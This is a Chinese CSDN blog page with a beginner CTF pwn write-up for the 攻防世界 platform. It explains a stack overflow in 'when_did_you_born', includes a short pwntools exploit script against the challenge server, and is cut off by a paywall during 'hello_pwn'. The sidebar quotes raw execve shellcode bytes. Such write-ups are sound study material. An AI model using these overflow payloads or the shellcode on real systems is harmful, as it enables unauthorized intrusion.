功防世界-pwn-新手练习(更新中)

最新推荐文章于 2024-07-02 22:53:15 发布
最新推荐文章于 2024-07-02 22:53:15 发布
阅读量932 收藏 4
点赞数
分类专栏: 攻防世界 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/88982793
版权
本文是一篇关于Pwn初学者的实战教程,详细讲解了从CGfsb到guess_num等不同级别的挑战解题过程,涉及栈溢出、ROP技术以及利用。通过分析ida伪码,找出利用点,构建payload,最终实现系统shell的获取。
摘要由CSDN通过智能技术生成

1、CGfsb:https://blog.csdn.net/zz_Caleb/article/details/88980866

2、when_did_you_born(简单的ROP)

下载文件,是一个64位的elf文件,放到ida中看伪码,报错:

 搜了一下这个问题,是栈的问题,可以通过修改一些设置来解决,但是,找到了main函数:

 在这个地方查看伪码不会报错,而且主函数的源码可以得到:

分析一下伪码,v5==1926会让我们拿到flag,但是,前面对v5进行了过滤,所以我们再输入的时候就不能把v5的值输成1926,那怎么办呢?我们看到最前面给出了v4和v5的位置:

char v4; // [rsp+0h] [rbp-20h]
unsigned int v5; // [rsp+8h] [rbp-18h]

所以v5比v4的地址大了8位,而在输入v4的时候用的是gets函数,不会对输入的字符串长度进行限制,所以我们可以利用变量的溢出,将溢出的数据覆盖v5使v5的值为1926,构造payload = "A"*8 + p32(1926)即可。

下面给出脚本:
 

from pwn import *

p = remote('111.198.29.45', 31788)
p.sendlineafter('Birth?\n', '1998')
payload = 'AAAAAAAA' + p32(1926)
p.sendlineafter('Name?\n', payload)
print(p.recvall())

运行结果:

4、hello_pwn

64位elf文件,ida查看伪码:

 看一下这个sub_400686()函数:

所以我们的目标就是让dword_60106C == 1853186401,read(0, &unk_601068, 0x10uLL)是将键盘输入的数据存储到unk_601068中,我们看一下unk_601068的位置发现unk_601068和dword_60106C 的位置只相差4:

 我们可以对unk_601068进行输入,而且这里也是不限定输入长度的,所以我们可以输入unk_601068使其溢出来把1853186

最低0.47元/天 解锁文章
大千SS
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN入门(练习课)
小心信科理化声
12-13 2041
经过前几期的讲解,是时候来做几个实战的题目来练习一下了~! 难度1: pwn1 老样子,先checksec一下。 可以看到这是一个32位的程序,并且开启了NX数据执行保护。 (本来以为这个题目时有些难度,或许得构造ROPchain)但是事实证明我想多了。 拖进IDA里面分析一下 主函数里只是调用了一下welcome函数 这里有个十分明显的getflag函数 我们先去main函数里看一下 好家伙,gets先生又出来演习了,可以看到buf只有14个长度 再看一下有没有可能直接去溢出到system函数里面
PWN入门
z190814412的博客
01-02 1657
调用函数入栈顺序 调用的参数、函数返回地址(eip)、调用函数的基地址(ebp)、局部变量 技术分类 修改返回地址,让其指向溢出数据的一段指令(shellcode) 修改返回地址,让其指向内存已有的某个函数(return2libc) 修改返回地址,让其指向内存已有的一段指令(ROP) 修改某个被调用函数的地址,让其指向另一个函数(hijack GOT) Shellcode payload :...
【介绍下Pwn,什么是Pwn?】
最新发布
2301_81357485的博客
07-02 439
通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权,一旦攻击者。是一个俚语,起源于电子游戏社区,经常在英语用作网络或电子游戏文化的一个术语,最初,这个词是。一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件、或者制造更广泛的破坏。任务经常涉及在一个受限制的环境寻找和利用漏洞来访问受保护的资源或系统。这个词的意义被扩展到其他领域,尤其是计算机安全,在网络安全语境,另一个玩家,那通常意味着他们在竞技显著地优于对手。
pwn 入门基础
y0un9er
08-10 3793
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
攻防世界--pwn1
qq_73149934的博客
02-22 500
canary,ret2libc 注意:只能打通远端,且libc的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
PWN入门分享
CK_0ff的博客
02-08 9361
文章目录什么是PWNPWN的前置技能可执行文件常见漏洞基础环境环境配置步骤栈溢出漏洞栈函数调用栈ELF文件文件保护机制CanaryNXPIE(ASLR)RELROlinux内存布局结语 pwn基础入门分享 什么是PWN? 以下内容摘自百度百科: ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了 。 ​ PWN也可译为二进制漏洞挖掘,在CTF比赛,PWN题的目标是拿到flag,一般是在l
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
ctf题库ctf-pwn赛题收集
03-31
此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境测试和展示他们的技能。在比赛,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,...
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN的学习,是入门指导。
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
pwn入门】基础知识
Think++
09-16 1717
本文是B站学习的笔记,包含一些视频外的扩展知识。
攻防世界 pwn
清霂的博客
02-02 648
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
pwn零基础入门
热门推荐
weixin_45948183的博客
03-24 1万+
pwn零基础入门 很多初学者在初学pwn的时候,对pwn可能存在许多疑问,学什么,怎么学,今天和大家分享一下刚学pwn的一些资料的学习历程。 首先分享一下pwn的一系列学习资料 一、首先语言基础得打牢,1、汇编语言,《汇编语言—王爽》2、编程语言(C语言和python)C语言必须要会,题目大部分是用C语言写的,而且很多那些知识都要读libc的源代码。会python,exp用python写的,CTF...
PWN入门(1)基础知识和环境设置
Ba1_Ma0的博客
09-07 4439
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
pwn入门:详解gdb调试程序的常见命令
Bossfrank的博客
11-03 2613
本文主要以对一个程序的调试过程为例,介绍gdb调试器的常见命令,并直观的展示所谓“溢出”覆盖的效果以及大小端序的问题。涉及的知识点包括:pwn题目环境的部署、gdb调试的常见命令、大小端序的影响、简单解pwn题目脚本的编写。
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2563
攻防世界的格式化字符串漏洞利用,简单题
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值